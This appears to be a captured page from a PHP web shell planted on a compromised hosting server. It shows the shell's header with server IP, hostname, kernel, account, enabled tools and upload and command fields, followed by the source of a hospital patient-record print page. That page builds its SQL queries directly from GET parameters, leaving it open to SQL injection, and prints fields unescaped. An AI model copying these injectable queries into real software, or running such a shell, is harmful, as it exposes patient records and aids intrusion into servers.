Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.191.181.36
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/print/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/print/Print-SystemicExamination.php
<div class='col-sm-12'>
	     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>
						
             	 <?php

      

	    	$sqlpatient2 = "SELECT * FROM site_users WHERE userno='$rpatient[Admitted_Under]'";
	$qsqlpatient2 = mysqli_query($con,$sqlpatient2);
	if($rsn2 = mysqli_fetch_array($qsqlpatient2))
	{
	    echo"
<div class='checkbox'><span style='float: left;'><b>Admission On  :</b> $rpatient[created_at]<br>
<b>Consultant :</b>$rsn2[name]($rpatient[casetype])

</span>

<span style='float: right;'><B>File No.</B> :$rpatient[prescriptionid] <br>";


$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Intial Assessment<br>Request for Consultation<br>Doc no. '";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Intial Assessment<br>Request for Consultation<br>Doc no. '){
	        echo"<b>Doc.no </b>: $rsp[srno]";

} else{
    echo "";
}
       
	}


echo "</span></div><br>



<br><br>
<div class='checkbox'><span style='float: left;'><b>UHID :</b> $rspi1[patientid]</span><span style='float: right;'><b>Name</b> :$rspi1[patientname]</span></div>
     <br>
     <div class='checkbox'><span style='float: left;'><b>Age:</b> $rspi1[dob]</span><span style='float: right;'><b>SEX :</b>$rspi1[gendor]</span></div>
              <div class='card-body'>
             
      
      ";
	}


	?> 
      <br>   
             
 <div class="panel panel-primary">
               
    <div class="panel-body">
        
      <h4 class="text-on-pannel text-primary"><strong class="text-uppercase">
         Systemic Examination
 </strong></h4>              
               <br>
  
  <table width='100%' border='1' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Systemic_Examination WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 
<table width='100%' border='1' class='table table-bordered table-hover' border='1' width='100%'>
        
        <th></th>
            <th>Action</th>
        <th>Note</th>
        <tr>
            <td width='20%'>HISTORY OF  Any Systemic Disease</td>
             <td width='20%'>$rs[Systemic_Disease]</td>
             <td width='60%'>$rs[Systemic_Disease_note]</td>
        </tr>
         <tr>
            <td width='20%'>HISTORY OF  Anesthesia Events</td>
             <td width='20%'>$rs[Anesthesia_Events]</td>
             <td width='60%'>$rs[Anesthesia_Events_note]</td>
        </tr>
   <tr>
            <td width='20%'>HISTORY OF  Operations/SURGERY
</td>
             <td width='20%'>$rs[ho_Operations]</td>
             <td width='60%'>$rs[ho_Operations_note]</td>
        </tr>  
  <tr>
      <tr>
            <td width='20%'>HISTORY OF  Adverse Drugs Reaction
</td>
             <td width='20%'>$rs[Adverse_Drugs_Reaction]</td>
             <td width='60%'>$rs[Adverse_Drugs_Reaction_note]</td>
        </tr>  
  <tr>
            <td width='20%'>HISTORY OF  DRUG THERAPY

</td>
             <td width='20%'>$rs[DRUG_THERAPY]</td>
             <td width='60%'>$rs[DRUG_THERAPY_note]</td>
        </tr>  

        </table>
        
        
        <table width='100%' border='1' class='table table-bordered table-hover'> 
  <div class='center'>
      <h5 align='center'>SYSTEMIC EXAMINATION </h5>
        <h6>CARDIAO VASCULAR SYSTEM: RESPIRATORY SYSTEM: </h6>
      <tr><td><span style='font-size: 20px'>HISTORY OF CHEST PAIN 
</span></h3></td><td>";
if($rs[HISTORY_CHEST_PAIN] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"</td>";
echo"
<td><span style='font-size: 20px'>HISTORY OF PALPITATION </span></h3></td><td>";
if($rs[HISTORY_PALPITATION] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
  echo"
</td> </tr>";
echo"<tr>
<td><span style='font-size: 20px'>HISTORY OF HYPERTENTION 
</span></h3></td><td>";
if($rs[HISTORY_HYPERTENTION] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
<td><span style='font-size: 20px'>S1 &S2 </span></h3></td><td>$rs[S1_S2]
</td>
</tr>
<tr>
<td><span style='font-size: 20px'>MURMUR </span></h3></td><td>$rs[MURMUR]
</td>
<td><span style='font-size: 20px'>ECG REPORT</span></h3></td><td>$rs[ECG_REPORT]
</td>
</tr>
<tr>
<td><span style='font-size: 20px'>B/L  AIR ENTER IN LUNGS </span></h3></td><td>";
if($rs[ENTER_LUNGS] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>CREPITATIONS / WHEEZ 
</span></h3></td><td>";
if($rs[CREPITATIONS_WHEEZ] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr> 
<tr>
<td><span style='font-size: 20px'>HISTORY OF COUGH / BRONCHISOSM  </span></h3></td><td>";
if($rs[HISTORY_COUGH] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF BRONCHIAL ANTHMA 
</span></h3></td><td>";
if($rs[HISTORY_BRONCHIAL] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr> 
<tr>
<td><span style='font-size: 20px'>HISTORY OF REPAIRATORY DISEASES </span></h3></td><td>";


if($rs[HISTORY_REPAIRATORY] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
<td><span style='font-size: 20px'>PULMONARY FUNCTION TEST 
</span></td><td>$rs[PULMONARY_TEST]
</td>
</tr>       
          </div>      
          
          
</table>

<table width='100%' border='1' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>CENTRAL NERVOUS SYSTEM            </span> </td></tr></p>
      </table>
        <table width='100%' border='1' class='table table-bordered table-hover'> 
      <tr><td><span style='font-size: 20px'>HISTORY OF CONVULSION / FITS 
</span></h3></td><td>";

if($rs[HISTORY_CONVULSION] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF TREMOR </span></h3></td><td>";
if($rs[HISTORY_TREMOR] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr>  

<tr><td><span style='font-size: 20px'>HISTORY OF  GI BLEEDING 
</span></h3></td><td>";

if($rs[HISTORY_GI_BLEEDING] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF ANY NEUROLOGICAL DISEASE </span></h3></td><td>";


if($rs[NEUROLOGICAL_DISEASE] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
</tr>  
</table>
<table width='100%' border='1' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>GASTRO INTESTINAL SYSTEM           </span> </td></tr></p>
      </table>
        <table width='100%' border='1' class='table table-bordered table-hover'> 
<tr><td><span style='font-size: 20px'>H/O/ACIDITY / HEART BURN
</span></h3></td><td>";
if($rs[HEART_BURN] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}

echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF ANY OTHER DISEASE 
</span></h3></td><td>";
if($rs[OTHER_DISEASE] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr> 
    <tr>
<td><span style='font-size: 20px'>LIVER FUNCTION TEST  </span></h3></td><td>$rs[LIVER_FUNCTION_TEST]
</td>

</tr>   
</table>
<table width='100%' border='1' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>   ENDOCRINE SYSTEM </span> </td></tr></p>
      </table>
  <table width='100%' border='1' class='table table-bordered table-hover'> 
      <tr><td><span style='font-size: 20px'>HISTORY OF  DM 
</span></h3></td><td>";
if($rs[HISTORY_DM] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF HYPER / HYPO THYROIDISM 
</span></h3></td><td>";
if($rs[HISTORY_HYPER] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
echo"
</td>
</tr>
<tr><td><span style='font-size: 20px'>HISTORY OF ANY OTHER HARMONAL ABNORMALITY 
</span></h3></td><td>";


if($rs[HARMONAL_ABNORMALITY] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
</tr>
</table>
<table width='100%' border='1' class='table table-bordered table-hover'> 
      <p><tr><td><span style='font-size: 15px'>   GENITO URINARY SYSTEM </span> </td></tr></p>
      </table>
  <table width='100%' border='1' class='table table-bordered table-hover'> 
  <tr><td><span style='font-size: 20px'>HISTORY OF HAEMATURIA</span></h3></td><td>";
  if($rs[HISTORY_HAEMATURIA] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}
  echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF UTI  </span></h3></td><td>";
 if($rs[HISTORY_UTI] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}

echo"
</td>
</tr>  
<tr>
<td><span style='font-size: 20px'>HISTORY OF STD 
</span></h3></td><td>";
 if($rs[HISTORY_STD] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}

echo"
</td>
<td><span style='font-size: 20px'>HISTORY OF RENAL PROBLEM 
</span></h3></td><td>";

if($rs[RENAL_PROBLEM] == 'on'){
    echo "<i style='font-size: 20px' class='fa fa-check' aria-hidden='true'></i>";
} else{
    echo "<i  style='font-size: 20px' class='fa fa-times' aria-hidden='true'></i>";
}echo"
</td>
</tr>


";
}
?>

				</table>            
      
              
                       
        <div style="page-break-before:always">&nbsp;</div>       
	</div>
     
     
   
											
										</div>   	</div>

Anon7 - 2022
AnonSec Team